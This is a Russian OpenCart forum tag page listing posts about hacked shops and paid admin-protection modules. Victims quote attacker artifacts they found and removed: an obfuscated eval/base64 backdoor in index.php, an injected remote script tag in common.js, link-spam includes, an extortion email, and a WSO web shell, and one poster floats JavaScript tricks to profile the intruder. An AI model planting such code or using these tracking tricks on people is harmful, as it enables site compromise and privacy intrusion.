Jump to content

Search the Community

Showing results for tags 'взлом'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Основной
    • Новости и анонсы
    • Предложения и пожелания
    • Акции, подарки, конкурсы и награды
  • For developers
    • Общие вопросы
    • Нововведения на форуме
  • Opencart 3.x
    • Opencart 3.x: Общие вопросы
    • Opencart 3.x: Установка и обновление
    • Opencart 3.x: Локализация
    • Opencart 3.x: Настройка и оптимизация
    • Opencart 3.x: Песочница
    • Opencart 3.x: Поиск модулей
    • Opencart 3.x: Отчёты об ошибках
  • Opencart 2.x
    • Opencart 2.x: Общие вопросы
    • Opencart 2.x: Установка и обновление
    • Opencart 2.x: Локализация
    • Opencart 2.x: Настройка и оптимизация
    • Opencart 2.x: Песочница
    • Opencart 2.x: Поиск модулей
    • Opencart 2.x / ocStore 2.x: Отчёты об ошибках
  • Поддержка и ответы на вопросы
    • Общие вопросы
    • Установка, обновление, настройка
    • Шаблоны, дизайн и оформление магазина
    • Модули и дополнения
    • Помощь программистам и разработчикам
    • Мобильная витрина
    • Вопросы безопасности
    • SEO-вопросы (оптимизация и продвижение магазина)
    • Перевод
    • Отчёты об ошибках
    • Интернет-магазины и электронная коммерция
    • Песочница
  • Услуги
    • Создание магазинов под ключ
    • Дизайн, верстка и шаблоны
    • Программирование, создание модулей, изменение функциональности
    • Настройка и мелкая работа по уже существующему сайту
    • Обновление версии движка магазина
    • Наполнение магазина
    • Системное администрирование (настройка хостинга, серверов, ПО)
    • Другие услуги
    • Отзывы об исполнителях
    • Отзывы о заказчиках
  • Разное
    • Примеры сайтов на OpenCart (ocStore)
    • Курилка
    • Предложения по улучшению
    • Группы

Categories

  • Шаблоны
    • Бесплатные шаблоны
    • Платные шаблоны
  • Filters
  • Promotions & Pricing
  • Coupons & reward points, affiliate programs
  • Blogs, News & Articles
  • Shopping Cart & Order
  • Product Options
  • Product Attributes
  • Product Combinations
  • Search
  • SEO & Optimization
  • Caching & Server Performance
  • Платежные системы
  • Доставки
  • Editors
  • Design & Navigation
  • Banners, Slideshows & Galleries
  • Email Marketing & SMS Integration
  • Customer Support & Chat
  • Обмен данными
  • Учет в заказе
  • Compare & Wishlist
  • Социальные сети
  • Parsers
  • Модули
  • Tools & Developer Tools
  • Licenses
  • Языковые пакеты
  • Прочее
  • Отчеты
  • Сборки
  • Услуги
    • Графика и дизайн
    • Маркетинг

Categories

  • Настройка OpenCart
  • Служебные документы
  • Оплата

Blogs

  • Konorws (Разработка и модификация Opencart)
  • Блог mr.Kent)
  • AWS
  • Прожектор Бритни Спирс
  • Layk
  • Продвижение интернет-магазина, seo оптимизация
  • Записная книжка
  • Блог RGB
  • Записки от sitecreator
  • О программировании и другом
  • Модули которые сделают сайт лучше
  • Блог веб-студии NeoSeo
  • Useful IT
  • Задачи, идеи, решения.
  • Найденные решения проблем с Opencart
  • ocdroid blog
  • Заметки на полях...
  • Pimur
  • Серж Ткач
  • О жизни, смерти, о бизнесе и Опенкарте
  • Полезное с бесполезным
  • Просто мысли от laim731
  • Маркетинг и продвижение интернет-магазина
  • Магазин Tv-Project.com
  • Мой копирайтинг
  • Разработка под Opencart
  • SEO боксинг специального назначения
  • Подбери свои боксерские перчатки
  • Get-Web Dev
  • Seok
  • Как добавить название города к домену на Опенкарт? (город в качестве категории)
  • Оптимизация и ускорение сайта: JavaScript...
  • Best practice
  • Ultimate Guide to Building an MVP
  • Vlad-Egorov-Blog

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Сайт


Skype


Город:


Интересы

Found 19 results

  1. 498.00 руб Скачать/Купить дополнение Защита от вирусов и хакеров Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью! Модуль умеет : Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута) В планах: Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа Добавить возможность задавать ссылку для переадресации Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha" Важно! Если у вас переименованная папка admin модуль не будет работать Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 1190 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3 2.2 2.1 2.0 ocStore 2.3 2.2 2.1 OpenCart.Pro, ocShop Opencart.pro 2.3 Opencart.pro 2.1 OcShop 2.0.3.х Не проверялось Обращение к серверу разработчика Нет  
  2. На почту пришло такое письмо. Как защитить сайт? Мы взломали ваш сайт http://www.brandoptics.com.ua и извлекли ваши базы данных. Как это случилось? Наша команда обнаружила уязвимость на вашем сайте, которую мы смогли использовать. После обнаружения уязвимости мы смогли получить учетные данные вашей базы данных, извлечь всю базу данных и перенести информацию на оффшорный сервер. Что это значит? Мы будем систематически проходить через ряд шагов, наносящих полный ущерб вашей репутации. Сначала ваша база данных будет пропущена или продана самой высокой цене, которую они будут использовать с какими бы намерениями они ни были. Затем, если будут найдены электронные письма, они будут отправлены по электронной почте, что их информация была продана или утечка, и ваш сайт http://www.brandoptics.com.ua был виноват, таким образом, нанося ущерб вашей репутации и вызывая злых клиентов / партнеров с что бы ни делали злые клиенты / партнеры. Наконец, любые ссылки, которые вы проиндексировали в поисковых системах, будут деиндексироваться на основе техник блэкхата, которые мы использовали в прошлом для индексации наших целей. Как мне это остановить? Мы готовы воздержаться от разрушения репутации вашего сайта за небольшую плату. Текущая плата составляет 2000 долларов США в биткойнах (BTC). Отправьте биткойн по следующему адресу биткойна (скопируйте и вставьте, так как он чувствителен к регистру): 1Md6imvB2neTF3s1kFiMG473k1XrBhxQhF Как только вы заплатите, мы автоматически получим уведомление о том, что это был ваш платеж. Обратите внимание, что вы должны произвести оплату в течение 5 дней после получения этого уведомления или утечки из базы данных, отправки электронных писем и начала индексации вашего сайта! Как я могу получить биткойны? Вы можете легко купить биткойны через несколько веб-сайтов или даже в автономном режиме через биткойн-банкомат. Мы предлагаем вам https://cex.io/ для покупки биткойнов. Что если я не буду платить? Если вы решите не платить, мы начнем атаку в указанную дату и будем поддерживать ее до тех пор, пока вы этого не сделаете. Никаких мер противодействия этому нет, вы в конечном итоге потратите больше денег, пытаясь найти решение. Мы полностью уничтожим вашу репутацию среди Google и ваших клиентов. Это не обман, не отвечайте на это письмо, не пытайтесь рассуждать или вести переговоры, мы не будем читать никаких ответов. Как только вы заплатите, мы прекратим то, что мы делали, и вы больше никогда не услышите от нас! Обратите внимание, что Биткойн является анонимным, и никто не узнает, что вы выполнили его. телефон: Германия
  3. Version 1.0.1

    Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью! Модуль умеет : Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута) В планах: Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа Добавить возможность задавать ссылку для переадресации Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha" Важно! Если у вас переименованная папка admin модуль не будет работать

    498.00 RUB

  4. Добрый день. Есть сайт https://okupi.net/ , с утра его взломали, висит фраза K4RNOS WAS HERE! HACKED! WWW.CYBER-DEMONS.COM, доступ к админке есть, сайт стоит на официально купленном шаблоне shop-store 2. Ничего на него не заливалось. Восстановление вплоть до копии 2-х месячной давности не дает результатов, все остается по прежнему. Может есть какие либо подсказки, буду очень признателен и спасибо
  5. Приветствую! Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя. Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру. Всем спасибо!
  6. Добрый день кто-то уже сталкивался с тем, что с сайта начинают торговать ссылками в невидимом блоке - добавили код в шаблон сайта, который размещает на страницах ссылки sape и linkfeed? появляются папки с id юзеров в папке: /catalog/view/image а коды размещения модуля на странице в контроллех прописаны и в шаблоне сайта пример такого кода в footer.php global $linkfeed; define('LINKFEED_USER', 'тут код одного юзера'); require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'.LINKFEED_USER.'/linkfeed.php'); $linkfeed = new LinkfeedClient(); global $sape; if (!defined('_SAPE_USER')){define('_SAPE_USER', 'тут код другого юзера');} require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'._SAPE_USER.'/sape.php'); $o = array(); $o['charset'] = 'UTF-8'; //ваша кодировка $o['force_show_code'] = false; //показать проверочный код $sape = new SAPE_client($o); ?> пример вывода в шаблоне, к сожалению, не сохранился( удалили, заменили доступы, прошло пару недель и он снова на сайте. Если вы справились, подскажите решение, как исправить?
  7. Добрый день! Ребят, кто понимает, в чем может быть проблема? Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500 Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё) mnogo-mozaiki.ru Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
  8. Старый сайт: OcStore 1.5 Тема стандартная (defaut) Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: что то такое (картинка из инета) В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js В конце файла была приписка: document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос: Как такие вещи вообще происходят на opencart? P.S. По поводу паролей можно не писать: 1. 10 значные с спецсимволами + регистры 2. В браузере не храню 3. В FileZilla тоже не храню Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? Или какие то минимумы, что необходимо сделать всем и вся?
  9. 498.00 руб Скачать/Купить дополнение Двух факторная Google авторизация для админ панели Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию! Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Добавил mirek Добавлено 02.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3 2.2 2.1 2.0 ocStore 2.3 2.2 2.1 OpenCart.Pro, ocShop Не проверялось
  10. 300.00 руб Скачать/Купить дополнение Двух факторная Google авторизация для покупателей Модуль позволяет обезопасить доступ к профилю покупателей на сайтах с CMS OcStore/OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту профиля покупателя магазина. Даже в том случае если злоумышленник получил логин и пароль от профиля покупателя магазина - он не сможет войти! Модуль активирует вход в профиль покупателя магазина используя двух факторную Google авторизацию! Модуль интегрируется в стандартную тему OcStore/Opencart Коды доступа меняются с интервалом в 30 секунд! Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство приложение Google Authenticator! Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации на Вашем сайте Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве! Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете для получения кодов для прохождения двух факторной Google авторизации Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! Лицензия: Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав) Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным. Тип распространения: as is (как есть) Установка: Для установки модуля customers2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в меню профиля покупателя появятся пункты "2fa google авторизация" Добавил mirek Добавлено 07.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua/ Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3 2.2 2.1 ocStore 2.3 2.2 2.1 OpenCart.Pro, ocShop Не проверялось
  11. Добрый вечер! Кто сталкивался помогите) Взломали сайты, пока заметил на двух оба на opencart, всего Пять на хостинге. Три на opencart два на wordpress. Недавно установил новый сайт на OcStore скачивал с форума, шаблон с оф сайта разработчика TechStore. Суть проблемы, когда заходишь на сайт с телефона вылезает на новостной баннер и ведёт по ссылке на Риа новости) И эта зараза переодически пропадает и появляется снова. Кто знает как это лечить? Может кто с этим сталкивался )
  12. Всем добрый день. С недавнего времени обратил внимание, что при заходе на сайт появляется всплывающее окошко: AdGuard обнаружил, что этот сайт пытается использовать ваш браузер для добычи криптовалюты. Это может создать заметную нагрузку на процессор. Нажмите "Отмена", чтобы заблокировать эту попытку. Кто то сталкивался с таким? Что это может быть? Заранее спасибо.
  13. Здравствуйте, взломали ocstore 2.3+купленный шаблон, больше никаких модулей не ставил. Похерили шаблон- показывает ошибку "Error: A theme has not been assigned to this store!". Заменили мыло, логин админа и зачем-то изменили в админке адрес лога об ошибках на dark.php. Возможно сделали что-то ещё. Учётку восстановил через БД, но если шаблон поставить на дефолтный, всё равно выдает ту же ошибку. Всё сносить и ставить заново? На сайте было не очень много информации, но если такое произойдет на рабочем магазине... Во всём полностью виноват сам- не принял меры по защите.
  14. Добрый день, взломали сайт давно(восстановить резервуню копию не вариант), проблему заметили не сразу Весь сервер почистили от вредоносных сайтов, нашел еще кусок кода, так же удалили но где то остался кусок этой заразы, из -за которой гугл поиск выдает иероглифы и какие то духи еще какую то фигню, и из-за этого сайт теперь не отображается при нужных запросах https://prnt.sc/ghc3am https://prnt.sc/ghc4i0 и такая проблема только с гугл поиском, на яндексе все норм, может кто знает где могут находится эти файлы и куски кода, или как исправить данную проблему. Так же этот вирус генерит кучу новых страниц, через гугл веб мастер они удаляются после индексации, при повторной индексации вылазит снова куча левых страниц 404
  15. Добрый день, знатоки. Недавно обнаружил в подвале на страницах некоторых товаров текстовую рекламу. Странно, что она не на всех страницах. Как можно ее убрать?
  16. Всем привет! Уже второй раз столкнулся со странной ситуацией, что БД магазина просто разваливается, или просто не удается получить к ней доступ. В логах наблюдается куча одинаковых ошибок, одинаковых запросов, которые появились в одну секунду, если смотреть по времени. Во вложении лог OpenCart. Пожалуйста, посмотрите, и подскажите, если кто сталкивался или знает что это может быть. Заранее благодарен! p.s. в логах site.ru - это мой сайт. Лог.txt
  17. Добрый день, потихоньку изучаю опенкарт 1.5.6 на своей сайте. Столкнулась со странной картиной пару дней назад.В админ. панели раздел "Клиенты онлайн" отображаются Ip посетителей и адреса страниц сайта где они находятся. Всегда там были страницы моего сайта, а теперь мелькают урлы сторонних не связанных с моим по тематике разнообразных сайтов. Обратилась к хостингу на предмет попыток взлома и наличия вредоносного на сайте. Хостинг сказал все чисто. Что это такое как с этим бороться? Буду рада любым ответам и помощи. Спасибо.
  18. Приветствую. Жаль, что название темы нельзя сменить я бы назвал ее - Ревизор) Сегодня, ко мне обратился бывший клиент с просьбой о помощи. Дело обстояло в том, что в .htaccess поставили редирект на какой-то публичный агрегатор рекламы (не арбузоустойчивый). Т.е. сначала переадресовывается на него, потом на какое-нибудь онлайн-казино. Переадресация идет только на планшетах/телефонах, тем самым забирая значительную часть аудитории сайта. Через 2-3 дня удаления кода он восстанавливается. Промежуток в 2-3 дня как-бы говорит о том, что файл переименовывается вручную, либо скрипт запускается вручную. После скачивания дампов сайта стал возможен анализ кода и access логов за неделю (что в последствии скажется). Анализ логов показал адреса запросов к "лишним" скриптам ("domain1.ru/docs/system/library/engine/1.php, domain2.ru/docs/system/library/stile.php"). При переходе к скрипту присутствует просьба ввести пароль, а значит это не просто скрипт, а шелл. После недолгой расшифровки предо мной предстал интерфейс. Шелл вполне распространенный, эргономичный и очень даже функциональный при его-то размере. Если понравился, то можете скачать называется WSO WEB Shell. Кстати после расшифровки md5 паролем оказался root После дополнительного анализа логов за неделю на всех доменах узнал, что на шелл заходят только через веб-прокси, которые расположены только у крупных хостинг-провайдеров (таймвеб, 1gb, клодо и т.д.). Это отработанная и вполне рабочая схема. Использование российских хостинг-провайдеров как бы говорит о том, что наш взломщик с территории бывшего СНГ, что есть хорошо. Если обратиться к хостинг-провайдерам с логами - ничего не даст. Ну, закроют его хостинг - зарегистрирует новый. При обилии сканов паспортов в публичном доступе можно не париться и зарегистрироваться прямо там же) В логах не видно через какую дыру он залил шеллы на сайт моего клиента, видимо прошла неделя с момента загрузки и в логах ничего нет. (Большинство хостинг-провайдеров хранят логи всего неделю) Предполагаемую дыру в не обновленном зарубежном модуле я закрыл, больше дыр не обнаружил. Зачем я все это писал, я хочу найти этого парня. Ну, или хотя бы более-менее точно составить его психологический портрет. Хочу посредством его же шелла получить максимум информации о нем. -------------------------------------- Этот параграф начну с того, что использовать php для получения информации не имеет смысла т.к. наш ревизор использует прокси. А вот javascript, который выполняется в его браузере очень даже можно. Слышал, что с помощью JS можно узнать IP адрес во внутренней сети (в NAT), только не помню где я об этом слышал. Я уже добавил авторизацию только со второго/третьего (пока не решил) раза, чтобы он ввел еще какой-нибудь пароль (хотя подумываю убрать). У него стоит хромиум или мозилла, винда 64x (из логов). Еще слышал про то, что с помощью js можно определить visited ссылка или нет. А значит можно написать страницу со списком сайтов с ссылками и прогнать его этим самым скриптом. Так можно будет узнать какие сайты посещал пользователь. Адреса сайтов нужно будет очень хорошо подобрать учитывая задачу и узкий круг интересов нашего ревизора. Что еще посоветуете?
  19. Ребят выручайте, подскажите что делать? Уже 2 раза за пол часа взломали сайт на опенкарт 1.5.6.4. В этот момент находился на сайте, усиленно пользовался файловым менеджером Power Image Manager
×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.